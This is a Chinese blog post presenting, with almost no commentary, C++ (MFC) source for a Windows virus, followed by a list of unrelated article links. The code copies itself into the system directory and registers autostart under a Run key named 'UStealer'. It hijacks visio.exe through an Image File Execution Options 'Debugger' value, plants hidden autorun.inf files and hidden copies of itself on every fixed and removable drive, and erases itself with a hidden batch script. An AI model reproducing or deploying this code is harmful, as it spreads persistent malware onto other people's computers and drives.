VirusBody01

原創 HX_ZXHY 2019-01-17 00:23 

void CHXVirusBody01Dlg::OnBnClickedOk()
{
	// 拷貝到系統目錄
	CopySelf();
	// 修改註冊表
	RegChange();
	// 生成autorun.inf文件
	Autorun();
	// 自刪除
	DeleteSelf();
}

void CHXVirusBody01Dlg::CopySelf()
{
	// 隱藏窗體
	this->ShowWindow(SW_HIDE);
	TCHAR szSysPath[MAX_PATH] = { 0 };
	GetSystemDirectory(szSysPath, sizeof(szSysPath));
	CString strFileName = szSysPath;
	strFileName += _T("\\test.exe");
	CopyFile(AfxGetApp()->m_pszAppName, strFileName.GetBuffer(), TRUE);
}

void CHXVirusBody01Dlg::DeleteSelf()
{
	//獲取自己的完整路徑
	char buf[MAX_PATH] = { 0 };
	HMODULE hModel = NULL;
	hModel = GetModuleHandle(0);
	GetModuleFileNameA(hModel, buf, MAX_PATH);
	CloseHandle((HANDLE)4);
	
	//生成批處理文件
	std::fstream  fFile;
	fFile.open(("1.bat"), std::ios::in | std::ios::out | std::ios::app);

	if (!fFile.is_open())
	{
		return ;
	}
	fFile.seekg(std::ios::beg);

	std::string str;
	str = ("@echo off\r\n");

	str += (":start\r\n\tif not exist ");
	str += buf;
	str += (" goto done\r\n");

	str += ("\tdel /f /q ");
	str += buf;
	str += ("\r\n");

	str += ("goto start\r\n");

	str += (":done\r\n");

	str += ("\tdel /f /q %0\r\n");

	fFile << str << std::endl;

	fFile.close();
	//隱藏運行批處理文件
	ShellExecute(NULL, _T("open"), _T("1.bat"), NULL, NULL, SW_HIDE);
	exit(0);
}

void CHXVirusBody01Dlg::RegChange()
{
	// 添加開機啓動
	HKEY hKey = NULL;
	DWORD rc;
	char buffer[MAX_PATH] = { 0 };
	rc = ::RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
		_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 
		0, 
		KEY_ALL_ACCESS, 
		&hKey);
	if (ERROR_SUCCESS == rc)
	{
		auto hx = AfxGetApp();
		::RegSetValueEx(hKey, _T("UStealer"), 0, REG_SZ, (BYTE*)AfxGetApp()->m_pszAppName, lstrlen(AfxGetApp()->m_pszAppName));
		RegCloseKey(hKey);
	}
	// 添加映像劫持列表
	DWORD dwDisposition = REG_CREATED_NEW_KEY;
	if ((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
		_T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\visio.exe"),
		0,
		NULL,
		REG_OPTION_NON_VOLATILE,
		KEY_ALL_ACCESS,
		NULL,
		&hKey,
		&dwDisposition)) == ERROR_SUCCESS)
	{
		CString str = AfxGetApp()->m_pszExeName;
		::RegSetValueEx(hKey, _T("Debugger"), 0, REG_SZ, (BYTE*)str.GetBuffer(), str.GetLength());
		::RegCloseKey(hKey);
	}
}

void CHXVirusBody01Dlg::Autorun()
{
	char Disk = NULL;
	UINT Type = 0;
	FILE * fp;
	char strFileName[MAX_PATH] = { 0 };
	char szDriveName[4] = { 0 };
	wsprintfA(szDriveName, ("C\\0"));
	// 遍歷所有可能存在的分區
	for (szDriveName[0] = 'C'; szDriveName[0] < 'Z'; ++szDriveName[0])
	{
		// 得到該分區的類型
		Type = GetDriveTypeA(szDriveName);
		if ((Type == DRIVE_REMOVABLE) || (Type == DRIVE_FIXED))
		{
			// 該盤是固定分區或者移動設備,感染
			Disk = szDriveName[0];
			sprintf_s(strFileName, ("%c:\\Autorun.inf"), Disk);
			// 創建Autorun.inf文件並寫入內容
			fp = fopen(strFileName, ("w+"));
			fprintf_s(fp, ("[AutoRun]\n"));
			fprintf_s(fp, ("OPEN=test.exe\n"));
			fprintf_s(fp, ("SHELLEXECUTE=test.exe\n"));
			fprintf_s(fp, ("shell\\Auto\\command=test.exe\n"));
			fprintf_s(fp, ("shell=Auto"));
			fclose(fp);
			// 將文件屬性設置爲隱藏
			SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
			// 拷貝入這些分區的根目錄中
			sprintf_s(strFileName, ("%c:\\test.exe"), Disk);
			CopyFile(AfxGetApp()->m_pszExeName, strFileName, TRUE);
			// 將文件屬性設置爲隱藏
			SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
		}
	}
}

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Qt/C++音視頻開發72-倍速推流/音視頻同步倍速推流/不改變幀率和採樣率/低倍速和高倍速

一、前言 最近多了個新需求,需要倍速推流,推流界的扛把子obs也有倍速推流功能,最高支持到兩倍速。這裏所說的倍速,當然只限定在文件,只有文件纔可能有倍速功能,因爲也只有文件才能倍速解碼播放。實時視頻流是不可能倍速的,因爲沒有時長,有時長的纔

飛揚青雲 2024-05-05 14:31:43

IDEA 選擇 Maven profile 後不生效

參考:Idea select maven profile sometimes not working 發現切換 profile 後沒有生效。 可以進入運行配置,在 Before launch 中加入 compile 目標。

Higurashi-kagome 2024-05-05 14:27:42

win11關閉自動檢測病毒刪文件

關閉掉保護即可. 有時候莊遊戲, 總是被系統當病毒刪了.

張博的博客 2024-05-05 14:19:42

編程方法學

編程語言Rank https://www.tiobe.com/tiobe-index/ 雷軍代碼:(彙編語言Assembly Language/.ass) https://cloud.tencent.com/developer/art

Qtodd 2024-05-05 14:13:31

.Net 8.0 下的新RPC,IceRPC之如何創建連接connection

作者引言 很高興啊,我們來到了IceRPC之如何創建連接connection,基礎引導,讓自已不在迷茫,快樂的暢遊世界。 如何創建連接connection 學習如何使用IceRPC,創建和接受連接。 連接有什麼用途? 連接在 Ice

xlgwr 2024-05-05 13:54:30

.NET 8 的openEuler 容器鏡像

目前.NET 8的容器鏡像已經支持openEuler,以openEuler爲基礎鏡像的應用鏡像:dotnet-deps、dotnet-runtime 和 dotnet-aspnet。基礎鏡像簡介這裏存放着由openEuler官方提供的容器鏡

張善友 2024-05-05 13:52:30

讓.NET 8 支持 Windows Vista RTM

衆所周知,從 Windows 的每次更新又會新增大量 API,這使得兼容不同版本的 Windows 需要花費很大精力。導致現在大量開源項目已經不再兼容一些早期的 Windows 版本,比如 .NET 8 AOT編譯命令行程序時生成的EXE,

張善友 2024-05-05 13:52:29

千兆寬帶實際網速能到達多少?

背景 在生活中,經常會遇到這樣的問題,我們申請的帶寬是1000M,但實際下載的最高速度只有125MB(1000Mb / 8 = 125MB) 有的人就會問,爲什麼下載速度這麼慢?爲什麼要除以8呢? 對於這個問題,首先要知道,帶寬和網速,他們

翎野 2024-05-05 13:49:29

剝開網線表皮,裏面的8根線分別代表什麼以及作用

 網線是現代網絡通信的核心組成部分,其八根線的作用各有不同。首先,網線由八根細線組成,每根細線都有其特定的功能和作用。 第一根細線: 負責發送數據信號。在計算機網絡通信中,數據的傳輸需要依靠信號來進行。因此,第一根細線的作用就是

翎野 2024-05-05 13:49:29

「 網絡安全術語解讀 」通用平臺枚舉CPE詳解

https://blog.csdn.net/u013129300/article/details/129329786

規格嚴格-功夫到家 2024-05-05 13:43:19

深入學習和理解Django視圖層:處理請求與響應

title: 深入學習和理解Django視圖層:處理請求與響應 date: 2024/5/4 17:47:55 updated: 2024/5/4 17:47:55 categories: 後端開發 tags: Django 請求處

Mifen 2024-05-05 13:38:28

成都 VS 深圳

日常 成都:好多老頭老太太 深圳:咋這個多年輕人 成都:早上公園一堆堆的打太極 深圳:早上公園一堆堆跳廣場舞 成都:一到冬天,天天霧霾 深圳:一年四季碧水藍天 成都:沒有山,山都在西邊去了 深圳:大山小山不少,有山或水必有公園。週末沒事爬爬

hua1989 2024-05-05 13:38:18

如何閱讀 Paper

前言 論文(Paper)通常是新技術、算法、編程方法或軟件工具的首次公佈。通過閱讀論文,我們可以瞭解最新的技術進展,保持自己的技能和知識是最新的。 同時,論文提供了對特定主題深入理解的機會。它們通常包含詳細的理論分析和實驗結果,這有助於深入

mghio 2024-05-05 13:32:48

REACT: SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS

發表時間:2023(ICLR 2023) 文章要點:文章提出一個簡單有效的ReAct框架,將reasoning和action結合,在交互式的環境上進行測試,取得了很好的效果。其中reasoning作爲推理模塊,幫助模型歸納,跟蹤和更新動作規

initial_h 2024-05-05 13:32:27

sysbench的部分基準性能測試學習

sysbench的部分基準性能測試學習 命令 Compiled-in tests: fileio - File I/O test cpu - CPU performance test memory - Memory funct

濟南小老虎 2024-05-05 13:29:27